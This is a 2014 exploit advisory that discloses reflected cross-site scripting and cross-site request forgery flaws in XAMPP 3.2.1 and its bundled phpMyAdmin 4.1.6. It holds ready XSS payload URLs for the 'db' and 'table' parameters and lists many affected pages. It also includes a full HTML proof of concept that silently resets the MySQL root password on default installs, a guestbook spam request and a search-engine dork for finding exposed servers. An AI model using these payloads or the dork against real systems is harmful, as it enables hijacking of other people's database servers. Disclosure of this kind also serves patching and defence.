XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities

# Title: XAMPP 3.2.1 & phpMyAdmin 4.1.6 <= multiple vulnerabilities
# Date: 6/04/2014
# Author: hackerDesk
# Software Link: http://www.apachefriends.org/en/xampp-windows.html
# Version: 3.2.1 & 4.1.6
# Tested on: Windows 7
# CVE : ()
# kuDos tO:* Mayank Kapoor(@wHys0SerI0s) Sujoy Chakravarti(@sujoy3188),
Gurjant Singh Sadhra(@GurjantSadhra)
 
 ██░ ██  ▄▄▄       ▄████▄   ██ ▄█▀▓█████  ██▀███  ▓█████▄ ▓█████   ██████  ██ ▄█▀
▓██░ ██▒▒████▄    ▒██▀ ▀█   ██▄█▒ ▓█   ▀ ▓██ ▒ ██▒▒██▀ ██▌▓█   ▀ ▒██    ▒  ██▄█▒ 
▒██▀▀██░▒██  ▀█▄  ▒▓█    ▄ ▓███▄░ ▒███   ▓██ ░▄█ ▒░██   █▌▒███   ░ ▓██▄   ▓███▄░ 
░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█  ▄ ▒██▀▀█▄  ░▓█▄   ▌▒▓█  ▄   ▒   ██▒▓██ █▄ 
░▓█▒░██▓ ▓█   ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░██▓ ▒██▒░▒████▓ ░▒████▒▒██████▒▒▒██▒ █▄
 ▒ ░░▒░▒ ▒▒   ▓▒█░░ ░▒ ▒  ░▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░ ▒▒▓  ▒ ░░ ▒░ ░▒ ▒▓▒ ▒ ░▒ ▒▒ ▓▒
 ▒ ░▒░ ░  ▒   ▒▒ ░  ░  ▒   ░ ░▒ ▒░ ░ ░  ░  ░▒ ░ ▒░ ░ ▒  ▒  ░ ░  ░░ ░▒  ░ ░░ ░▒ ▒░
 ░  ░░ ░  ░   ▒   ░        ░ ░░ ░    ░     ░░   ░  ░ ░  ░    ░   ░  ░  ░  ░ ░░ ░ 
 ░  ░  ░      ░  ░░ ░      ░  ░      ░  ░   ░        ░       ░  ░      ░  ░  ░   
 
[#]----------------------------------------------------------------[#]
#
# [x] XAMPP & phpMyAdmin <= 4.1.6 multiple vulnerabilites
# [x] Author : Mayank Kapoor(@wHys0SerI0s) Sujoy Chakravarti(@sujoy3188), Gurjant Singh Sadhra(@GurjantSadhra)
# [x] Contact : mayank.kapoor1708@gmail.com, gurjant31@gmail.com, sujoy3188@gmail.com
# [+] Download : http://www.apachefriends.org/en/xampp-windows.html
#
[#]----------------------------------------------------------------[#]
#
# [x] Exploit :
#
[1] phpMyAdmin is vulnerable to a cross site scripting attack.
# The vulnerability exists within the phpMyAdmin module supplied by XAMPP.
#
# 1. Cross Site Scripting
# 
# In the phpMyAdmin module of the XAMPP application the following urls are vulnerable to cross site scripting attacks. The "db" parameter can be passed with 
# { >"'><img src="javascript:alert(311050)"> } in the url resulting in a reflected cross site scripting attack. The file "c:\xampp\phpMyAdmin\libraries\db_table_exists.lib.php"
# checks if the "db" parameter is a valid database name or not (line 13-18).
#
	if (empty($is_db)) {
	    if (strlen($db)) {
		$is_db = @$GLOBALS['dbi']->selectDb($db);
	    } else {
		$is_db = false;
	    }


# Vulnerable parameter: "db"
# http://[host]/phpmyadmin/chk_rel.php?db=>"'><img src="javascript:alert(311050)">&token=6026d96cfcb8993f744a00809536dc8b&goto=db_operations.php
#
# Multiple URL's afected:
  http://[host]/phpmyadmin/db_printview.php
  http://[host]/phpmyadmin/index.php
  http://[host]/phpmyadmin/pmd_general.php
  http://[host]/phpmyadmin/prefs_manage.php
  http://[host]/phpmyadmin/server_collations.php
  http://[host]/phpmyadmin/server_databases.php
  http://[host]/phpmyadmin/server_engines.php
  http://[host]/phpmyadmin/server_export.php
  http://[host]/phpmyadmin/server_import.php
  http://[host]/phpmyadmin/server_privileges.php
  http://[host]/phpmyadmin/server_replication.php
  http://[host]/phpmyadmin/server_sql.php
  http://[host]/phpmyadmin/server_status.php
  http://[host]/phpmyadmin/server_variables.php
  http://[host]/phpmyadmin/sql.php
  http://[host]/phpmyadmin/tbl_create.php

# Vulnerable parameter: "table"
#
# Similar to the above mentioned vulnerability, here the "table" parameter also can be submitted with { >"'><img src="javascript:alert(311050)"> } in the url resulting in a reflected cross site scripting attack.
#
# Multiple URL's afected:

 http://[host]/phpmyadmin/tbl_select.php?db=information_schema&token=6026d96cfcb8993f744a00809536dc8b&goto=db_structure.php&table=>"'><img src="javascript:alert(347790)">#PMAURL-0:tbl_select.php?db=information_schema&table=>"'><img+src="javascript:alert(347790)">&server=1&target=&lang=en&collation_connection=utf8mb4_general_ci&token=529d5dba2f3dd12daf48aa38596e1708

 http://[host]/phpmyadmin/tbl_structure.php
#
#
# 2. Cross Site Request Forgery
# After installing XAMPP the default password for MySQL is blank with the default user being "root". In the link "http://localhost/security/xamppsecurity.php" there is an option to change
# the MySQL password for the user "root". The form that submits the new password is not authenticated with a token or any such XSRF protection. The below html page can be sent to the victim,

	<html>
	<script>
	document.getElementById("xampp").submit();
	</script>
	  <body onload="run_once()">
	    <form id="xampp" action="http://localhost/security/xamppsecurity.php" method="POST">
	      <input type="hidden" name="mypasswd" value="test@123" />
	      <input type="hidden" name="mypasswdrepeat" value="test@123" />
	      <input type="hidden" name="authphpmyadmin" value="cookie" />
	      <input type="hidden" name="changing" value="Password changing" />
	      <input type="hidden" name="xamppuser" value="" />
	      <input type="hidden" name="xampppasswd" value="" />
	      <input type="submit" value="Click here" />
	    </form>
	  </body>
	</html>

# thus succesfully changing the password to "test@123". This will only work if the password has never been changed since installation.
#
#
# Another location in the XAMPP application vulnerable to Cross site request forgery is the guestbook section http://localhost/xampp/guestbook-en.pl .

 http://localhost/xampp/guestbook-en.pl?f_name=spam&f_email=spam&f_text=spam

 dork: "inurl:xampp/guestbook-en.pl"

[#]----------------------------------------------------------------[#]
 
#EOF